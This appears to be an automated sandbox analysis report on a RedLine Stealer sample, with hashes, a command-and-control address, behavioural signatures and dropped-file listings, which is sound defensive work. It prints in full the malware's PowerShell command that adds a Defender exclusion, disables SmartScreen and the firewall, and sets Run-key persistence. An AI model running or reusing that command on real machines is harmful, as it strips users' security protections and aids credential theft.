Analysis
-
max time kernel
44s -
max time network
105s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
07-07-2022 14:32
Static task
static1
Behavioral task
behavioral1
Sample
47645.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
47645.exe
Resource
win10v2004-20220414-en
General
-
Target
47645.exe
-
Size
1.8MB
-
MD5
30b6d624d18490acfe42a1944c6d3172
-
SHA1
35402770ba44139f50b5613c274a6b4607be3b16
-
SHA256
d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92
-
SHA512
42f7b92a99a52c9a229cf09d945d5fcad38a4eecedfe609af6e77d9f5e966b37835a094c5b2121d20e6339fa450c0488af44046f5057e42021a61aae98cf6f4c
Malware Config
Extracted
redline
1327052997
37.235.54.26:8362
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/213420-65-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/213420-70-0x000000000041972E-mapping.dmp family_redline behavioral1/memory/213420-71-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/213420-72-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
doc.exeDllHost.exepid process 1448 doc.exe 1364 DllHost.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Drops startup file 1 IoCs
Processes:
DllHost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk DllHost.exe -
Loads dropped DLL 9 IoCs
Processes:
47645.exeDllHost.exeWerFault.exepid process 536 47645.exe 536 47645.exe 536 47645.exe 1268 1364 DllHost.exe 213620 WerFault.exe 213620 WerFault.exe 213620 WerFault.exe 213620 WerFault.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 api.ipify.org 10 api.ipify.org 11 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
doc.exedescription pid process target process PID 1448 set thread context of 213420 1448 doc.exe AppLaunch.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 213620 1364 WerFault.exe DllHost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
DllHost.exepowershell.exeAppLaunch.exepid process 1364 DllHost.exe 1364 DllHost.exe 213568 powershell.exe 213420 AppLaunch.exe 213420 AppLaunch.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
AppLaunch.exepowershell.exedescription pid process Token: SeDebugPrivilege 213420 AppLaunch.exe Token: SeDebugPrivilege 213568 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
47645.exedoc.exeDllHost.exepowershell.exedescription pid process target process PID 536 wrote to memory of 1448 536 47645.exe doc.exe PID 536 wrote to memory of 1448 536 47645.exe doc.exe PID 536 wrote to memory of 1448 536 47645.exe doc.exe PID 536 wrote to memory of 1448 536 47645.exe doc.exe PID 536 wrote to memory of 1364 536 47645.exe DllHost.exe PID 536 wrote to memory of 1364 536 47645.exe DllHost.exe PID 536 wrote to memory of 1364 536 47645.exe DllHost.exe PID 536 wrote to memory of 1364 536 47645.exe DllHost.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1448 wrote to memory of 213420 1448 doc.exe AppLaunch.exe PID 1364 wrote to memory of 213568 1364 DllHost.exe powershell.exe PID 1364 wrote to memory of 213568 1364 DllHost.exe powershell.exe PID 1364 wrote to memory of 213568 1364 DllHost.exe powershell.exe PID 1364 wrote to memory of 213620 1364 DllHost.exe WerFault.exe PID 1364 wrote to memory of 213620 1364 DllHost.exe WerFault.exe PID 1364 wrote to memory of 213620 1364 DllHost.exe WerFault.exe PID 213568 wrote to memory of 213700 213568 powershell.exe netsh.exe PID 213568 wrote to memory of 213700 213568 powershell.exe netsh.exe PID 213568 wrote to memory of 213700 213568 powershell.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\47645.exe"C:\Users\Admin\AppData\Local\Temp\47645.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\doc.exe"C:\Users\Admin\AppData\Local\Temp\doc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DllHost.exe"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)3⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1364 -s 15163⤵
- Loads dropped DLL
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\DllHost.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
C:\Users\Admin\AppData\Local\Temp\DllHost.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
C:\Users\Admin\AppData\Local\Temp\doc.exeFilesize
2.4MB
MD5401cdd939e412e97c9eab5766be869d9
SHA1e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
SHA2567b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
SHA512266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b
-
\ProgramData\MicrosoftNetwork\System.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
\Users\Admin\AppData\Local\Temp\DllHost.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
\Users\Admin\AppData\Local\Temp\DllHost.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
\Users\Admin\AppData\Local\Temp\DllHost.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
\Users\Admin\AppData\Local\Temp\DllHost.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
\Users\Admin\AppData\Local\Temp\DllHost.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
\Users\Admin\AppData\Local\Temp\DllHost.exeFilesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
\Users\Admin\AppData\Local\Temp\doc.exeFilesize
2.4MB
MD5401cdd939e412e97c9eab5766be869d9
SHA1e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
SHA2567b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
SHA512266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b
-
\Users\Admin\AppData\Local\Temp\doc.exeFilesize
2.4MB
MD5401cdd939e412e97c9eab5766be869d9
SHA1e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
SHA2567b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
SHA512266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b
-
memory/1364-62-0x000007FEFB721000-0x000007FEFB723000-memory.dmpFilesize
8KB
-
memory/1364-59-0x0000000000000000-mapping.dmp
-
memory/1448-56-0x0000000000000000-mapping.dmp
-
memory/213420-70-0x000000000041972E-mapping.dmp
-
memory/213420-73-0x0000000075B61000-0x0000000075B63000-memory.dmpFilesize
8KB
-
memory/213420-72-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/213420-65-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/213420-71-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/213420-63-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/213568-84-0x0000000002454000-0x0000000002457000-memory.dmpFilesize
12KB
-
memory/213568-79-0x000007FEF33D0000-0x000007FEF3DF3000-memory.dmpFilesize
10.1MB
-
memory/213568-74-0x0000000000000000-mapping.dmp
-
memory/213568-85-0x000007FEF2870000-0x000007FEF33CD000-memory.dmpFilesize
11.4MB
-
memory/213568-86-0x000000001B700000-0x000000001B9FF000-memory.dmpFilesize
3.0MB
-
memory/213568-89-0x0000000002454000-0x0000000002457000-memory.dmpFilesize
12KB
-
memory/213568-90-0x000000000245B000-0x000000000247A000-memory.dmpFilesize
124KB
-
memory/213620-78-0x0000000000000000-mapping.dmp
-
memory/213700-87-0x0000000000000000-mapping.dmp